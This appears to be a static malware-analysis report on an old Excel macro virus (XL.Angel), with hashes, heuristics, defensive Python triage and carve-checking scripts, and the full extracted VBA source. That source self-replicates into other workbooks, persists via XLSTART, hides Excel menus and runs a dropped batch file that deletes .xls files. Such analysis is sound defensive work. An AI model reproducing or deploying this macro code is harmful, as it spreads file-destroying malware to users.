Xls.Trojan.Dbt-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 8f626fa6ca05e431…

MALICIOUS

Office (OLE)

Size: 82.0 KB · Created: 1999-02-08 09:24:15 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: f989de14d65a25b86495c3fb2ead63ad
SHA-1: 32e5cb32ef5609ea16496fc6abebbd9a04f9ae97
SHA-256: 8f626fa6ca05e431a4b77ad20a6869fee24190282e1579ea8445d47f18fdd7d0
Risk score: 400

Malware Insights

Xls.Trojan.Dbt-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1547.001 Registry Run Keys / Startup Folder · T1566.001 Spearphishing Attachment

This Excel document carries the self-replicating XL.Angel macro virus (author comment "koded by D@rkByTe", module stamp "'Infected Date :  2/22/2000"). On open, Workbook_Open calls stealth(), which turns off application events, resets the Tools bar, disables the Tools > Macro, Customize and Options entries, hides the Visual Basic toolbar and clears the recent-files list so the code is hard to inspect or interrupt. Only when the running copy is itself named Angel.xls (the XLSTART copy) does Workbook_Open go on to add a fresh workbook and call copyvir(); in an ordinary infected document copyvir() runs from Workbook_BeforeClose instead. copyvir() changes into Application.Path\xlstart, the Excel startup folder, and if no Angel.xls is there writes delxls.bat ("del *.xls", "del *.bat"), runs it hidden via Shell(), and saves a new workbook titled "Angel" / subject "Virus" as Angel.xls so the code loads at every Excel start. copyvir2() is the propagation step: it locates a VBA component in any open workbook that contains the "Angel" marker, takes its code with an appended "'Infected Date :" comment, and inserts it into every component that lacks the marker. Because that insertion is indiscriminate, the Sheet1 module below carries a Workbook_Open handler that can never fire (sheet modules only raise Worksheet events); the copy in ThisWorkbook is the live one. The BeforeClose and BeforeSave handlers force a save in c:\My documents so the injected code lands on disk.

Practical caveats. The XLSTART placement is Office application startup persistence, which T1137.001 Office Template Macros describes more precisely than the T1547.001 label above. On current Office the chain is largely inert: macros in files from the internet are blocked by default, the copyvir2 injection needs "Trust access to the VBA project object model" enabled, and the CommandBars tampering targets the Excel 97/2000 menu bar. Host indicators worth a hunt are Angel.xls and delxls.bat in the XLSTART folder and the "Infected Date :" comment in any workbook's VBA modules.

The two carved embedded-office artifacts below should not be read as a second, exploit-bearing document without verification: both carve offsets (0x60F8 and 0x8E19) are unaligned to the 512-byte CFB sector, both carved ranges end at the same byte 83,968, which is the displayed 82.0 KB file size, and the 59,144-byte child declares no streams at all. That pattern is what a signature-based carver produces when the CFB magic occurs inside the parent's own data, so the EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE, OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS findings should be confirmed by parsing the child's header before they count as evidence. The malicious verdict rests on the VBA, which is readable and unobfuscated.

Heuristics (8)

  • ClamAV: Xls.Trojan.Dbt-1 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dbt-1
  • Embedded Office document has suspicious static findings · critical · EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected · medium · 3 related findings · OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA · critical · OLE_VBA_SHELL
    The macro calls Shell(), which launches an external program or command line (here the dropped delxls.bat).
  • Workbook_Open macro · high · OLE_VBA_WBOPEN
    A Workbook_Open handler runs automatically whenever the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens · high · OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region · high · OLE_SLACK_ANOMALY
    OLE file is 59,144 bytes but its declared streams total only 0 bytes — 59,144 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • CFB header with no readable streams · medium · OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
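The VBA findings above (auto-exec handler, Shell() call, XLSTART path, VBProject access) are exactly what a triage script can score once olevba has extracted the source. The following is an added example, not code from this report, from the scanner or from oletools: it applies such rules line by line to VBA source text and runs them over a constructed excerpt abridged from the macros.bas listing further down. The rule names and severities are our own assumptions, not the scanner's IDs.

```python
"""Behavioural triage of extracted VBA source (added example, not the scanner's code)."""
import re
from dataclasses import dataclass

# (rule, severity, regex) applied to every non-comment line, case-insensitively.
# Names and severities are assumptions chosen for this example.
RULES = [
    ("AUTO_EXEC", "high",
     r"\bSub\s+(Workbook_Open|Auto_Open|AutoOpen|Document_Open|Workbook_Activate)\b"),
    ("SHELL_EXEC", "critical", r"\bShell\s*\("),
    ("BATCH_DROP", "critical", r'\bOpen\s+"[^"]+\.bat"\s+For\s+Output\b'),
    ("FILE_DELETE", "high", r'\bPrint\s+#\d+\s*,\s*"del\s'),
    ("XLSTART_PERSIST", "high", r"xlstart"),
    ("VBPROJECT_ACCESS", "high", r"\.VBProject\b"),
    ("VBPROJECT_INFECT", "critical", r"\.CodeModule\.(InsertLines|AddFromString)\b"),
    ("UI_TAMPER", "medium",
     r"CommandBars\(.*\)\.(Controls\(.*\)\.Enabled|Visible)\s*=\s*False"),
    ("EVENTS_DISABLED", "medium", r"\bEnableEvents\s*=\s*False"),
]
# The virus stamps every module it infects with this comment; it is the cheapest IOC.
MARKER_RX = re.compile(r"^'\s*Infected Date\s*:", re.IGNORECASE)
_COMPILED = [(name, sev, re.compile(rx, re.IGNORECASE)) for name, sev, rx in RULES]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int
    line: str


def triage_vba(source: str) -> list[Finding]:
    """Match every rule against every line; one line may yield several findings."""
    findings: list[Finding] = []
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("'"):
            # Comments cannot execute; only the virus's own marker is of interest.
            if MARKER_RX.search(line):
                findings.append(Finding("INFECTION_MARKER", "info", no, line))
            continue
        for name, sev, rx in _COMPILED:
            if rx.search(line):
                findings.append(Finding(name, sev, no, line))
    return findings


def rule_counts(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def verdict(findings: list[Finding]) -> str:
    """An auto-exec handler paired with an execution or self-replication
    primitive is what turns a macro document from suspicious into malicious."""
    rules = {f.rule for f in findings}
    executes = rules & {"SHELL_EXEC", "BATCH_DROP", "VBPROJECT_INFECT"}
    if "AUTO_EXEC" in rules and executes:
        return "malicious"
    if executes or rules & {"VBPROJECT_ACCESS", "XLSTART_PERSIST", "INFECTION_MARKER"}:
        return "suspicious"
    return "clean"


# Constructed excerpt, abridged from the extracted macros.bas shown on this page.
SAMPLE_VBA = """\
'XL.Angel Virus
Private Sub Workbook_Open()
Call stealth
If Me.Name = "Angel.xls" Then
Workbooks.Add
copyvir
End If
End Sub
Sub copyvir()
q = Application.Path & "\\xlstart"
ChDir (q)
Open "delxls.bat" For Output As #1
Print #1, "del *.xls"
Close #1
t = Shell("delxls.bat /c", vbHide)
End Sub
Sub copyvir2()
infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
w.VBProject.VBComponents(d).CodeModule.InsertLines 1, code
End Sub
Sub stealth()
Application.Dialogs(xlDialogRun).Application.EnableEvents = False
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Application.CommandBars("Visual Basic").Visible = False
End Sub
'Infected Date :  2/22/2000
"""

# Constructed benign macro for contrast.
BENIGN_VBA = """\
Sub FormatTotals()
Range("A1:A10").Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    found = triage_vba(SAMPLE_VBA)
    for f in found:
        print(f"{f.severity:8} {f.rule:18} L{f.line_no}: {f.line}")
    print("verdict:", verdict(found), rule_counts(found))
```

Comment lines are skipped deliberately: the banner "'XL.Angel Virus" is not evidence of execution, while the "'Infected Date :" stamp is a reliable marker because the virus writes it itself on every module it infects.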

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20838 bytes
SHA-256: bb9a3768be7306d5edc22a788c1df1aaefd8bfa9f604f67098d17bc1e140ed6f
Detection
ClamAV: Xls.Trojan.Dbt-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XL.Angel Virus
'For Educational Purposes only
'Do not Distribute
'koded by D@rkByTe
Private Sub Workbook_BeforeClose(Cancel As Boolean)
ChDir ("c:\My documents")
Call copyvir
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
ChDir ("c:\My documents")
Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
ChDir ("c:\My documents")
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
  ChDir ("c:\My documents")
  Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "Angel.xls" Then
Workbooks.Add
copyvir
End If
End Sub

Sub copyvir()
q = Application.Path & "\xlstart"
ChDir (q)
w = Dir("*.xls")
If w = "" Or w <> "Angel.xls" Then
    Open "delxls.bat" For Output As #1
    Print #1, "del *.xls"
    Print #1, "del *.bat"
    Print #1, "exit"
    Close #1
    t = Shell("delxls.bat /c", vbHide)
    Set newBook = Workbooks.Add
    With newBook
        .Title = "Angel"
        .Subject = "Virus"
        .SaveAs FileName:="Angel.xls"
    End With
Call copyvir2
End If

Call copyvir2
End Sub
Sub copyvir2()
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = True Then
    haba = w.VBProject.VBComponents(d).CodeModule.CountOfLines
    code = w.VBProject.VBComponents(d).CodeModule.Lines(1, haba) & Chr(13) & "'" & "Infected Date :  " & Date

End If
 Next d
Next w
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = False Then
     w.VBProject.VBComponents(d).CodeModule.InsertLines 1, code
     
End If
 Next d
Next w
End Sub
Sub stealth()

Application.Dialogs(xlDialogRun).Application.EnableEvents = False
Application.CommandBars("Tools").Reset
Application.RecentFiles.Maximum = 0
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Application.CommandBars("View").Controls("Toolbars").Enabled = False
Application.CommandBars("Tools").Controls("Customize...").Enabled = False
Application.CommandBars("Tools").Controls("Options...").Enabled = False

Application.CommandBars("Visual Basic").Visible = False
Application.CommandBars("Visual Basic").Controls("Macros...").Enabled = False
End Sub
'Infected Date :  2/22/2000

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XL.Angel Virus
'For Educational Purposes only
'Do not Distribute
'koded by D@rkByTe
Private Sub Workbook_BeforeClose(Cancel As Boolean)
ChDir ("c:\My documents")
Call copyvir
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
ChDir ("c:\My documents")
Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
ChDir ("c:\My documents")
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
  ChDir ("c:\My documents")
  Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "A
... (truncated)
embedded_office_off000060f8.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60F8 | 59144 bytes
SHA-256: 83bff5e22483847a88ecbdf1cde91c044043726f05efb5b8f6d2deb9899187ac
embedded_office_off00008e19.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8E19 | 47591 bytes
SHA-256: f6993f3eb8799605648d5020ec3019d8d2c65f1ea4a429c00e4d286684b08f80
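The two embedded-office carves above and the OLE_SLACK_ANOMALY / OLE_PARSE_EMPTY_STREAMS findings all turn on one question: is the carved object a compound file whose FAT and directory can actually be reached, or just a CFB signature that happens to occur inside other data? The following added example, which is not the report's or the scanner's code, answers that from the 512-byte header alone (field layout per [MS-CFB]) and from the carve geometry listed above. The 83,968-byte parent size is inferred from the displayed 82.0 KB and is an assumption; the two header blobs it checks are constructed here, not the real carved children.

```python
"""Sanity checks for CFB/OLE objects carved from a parent file (added example)."""
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN, FREESECT = 0xFFFFFFFE, 0xFFFFFFFF
PARENT_SECTOR = 512          # sector size of a version-3 compound file

# Carve geometry taken from this page; parent size assumed from "82.0 KB".
PAGE_FILE_SIZE = 82 * 1024   # 83968, an assumption
PAGE_CARVES = [(0x60F8, 59144), (0x8E19, 47591)]


def parse_header(blob: bytes) -> dict:
    """Decode the header fields needed here; ValueError if there is no CFB magic."""
    if len(blob) < 512 or blob[:8] != CFB_MAGIC:
        raise ValueError("no CFB header")
    major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHH", blob, 0x1A)
    _n_dir, n_fat_sectors, first_dir = struct.unpack_from("<III", blob, 0x28)
    difat0 = struct.unpack_from("<I", blob, 0x4C)[0]   # first FAT sector number
    return dict(major=major, byte_order=byte_order, sector_shift=sector_shift,
                mini_shift=mini_shift, n_fat_sectors=n_fat_sectors,
                first_dir=first_dir, difat0=difat0)


def header_problems(blob: bytes) -> list[str]:
    """Reasons the carved bytes cannot be a readable compound file (empty = plausible)."""
    try:
        h = parse_header(blob)
    except ValueError as e:
        return [str(e)]
    problems = []
    if h["byte_order"] != 0xFFFE:
        problems.append("byte-order mark is not 0xFFFE")
    if (h["major"], h["sector_shift"]) not in ((3, 9), (4, 12)):
        problems.append(f"version {h['major']} with sector shift {h['sector_shift']} is not a valid pair")
        return problems          # sector size unknown, so further offsets are meaningless
    sector = 1 << h["sector_shift"]
    if h["n_fat_sectors"] == 0 or h["difat0"] in (ENDOFCHAIN, FREESECT):
        problems.append("no FAT sector is declared, so no stream chain can be followed")
    dir_off = (h["first_dir"] + 1) * sector      # sector N starts at byte (N + 1) * sector
    if h["first_dir"] in (ENDOFCHAIN, FREESECT) or dir_off + sector > len(blob):
        problems.append("first directory sector lies outside the carved bytes")
    return problems


def assess_carve(parent_size: int, offset: int, size: int) -> dict:
    """Geometry checks that need no bytes: a real embedded object normally sits on a
    parent sector boundary, and a carve that runs exactly to EOF from an unaligned
    signature hit is the classic carver artifact."""
    return {
        "sector_aligned": offset % PARENT_SECTOR == 0,
        "runs_to_eof": offset + size == parent_size,
        "declared_end": offset + size,
    }


def build_header(sector_shift=9, n_fat=1, first_dir=1, difat0=0) -> bytes:
    """Constructed minimal version-3 header; field offsets follow [MS-CFB] 2.2."""
    h = bytearray(512)
    h[:8] = CFB_MAGIC
    struct.pack_into("<HHHH", h, 0x1A, 3, 0xFFFE, sector_shift, 6)
    struct.pack_into("<III", h, 0x28, 0, n_fat, first_dir)
    struct.pack_into("<I", h, 0x38, 4096)                 # mini stream cutoff
    struct.pack_into("<II", h, 0x3C, ENDOFCHAIN, 0)       # no mini FAT
    struct.pack_into("<II", h, 0x44, ENDOFCHAIN, 0)       # no extra DIFAT sectors
    for i in range(109):
        struct.pack_into("<I", h, 0x4C + 4 * i, FREESECT)
    struct.pack_into("<I", h, 0x4C, difat0)
    return bytes(h)


# Constructed: header + FAT sector 0 + directory sector 1, i.e. a reachable directory.
GOOD_OBJECT = build_header() + b"\x00" * 1024
# Constructed: CFB magic followed by bytes that never reach a FAT or directory, the
# shape a signature carver yields when the magic occurs inside unrelated data.
GHOST_OBJECT = build_header(n_fat=0, first_dir=ENDOFCHAIN, difat0=FREESECT) + b"\x00" * 64

if __name__ == "__main__":
    for off, size in PAGE_CARVES:
        print(hex(off), assess_carve(PAGE_FILE_SIZE, off, size))
    print("good object:", header_problems(GOOD_OBJECT))
    print("ghost object:", header_problems(GHOST_OBJECT))
```

Run against the real children, header_problems() on the carved bytes plus assess_carve() on the offsets is enough to decide whether to keep chasing a wrapped exploit or to attribute the three structural findings to the carver. For the offsets on this page both geometry flags already point to the artifact reading: neither offset is sector-aligned and both carves end at the same byte.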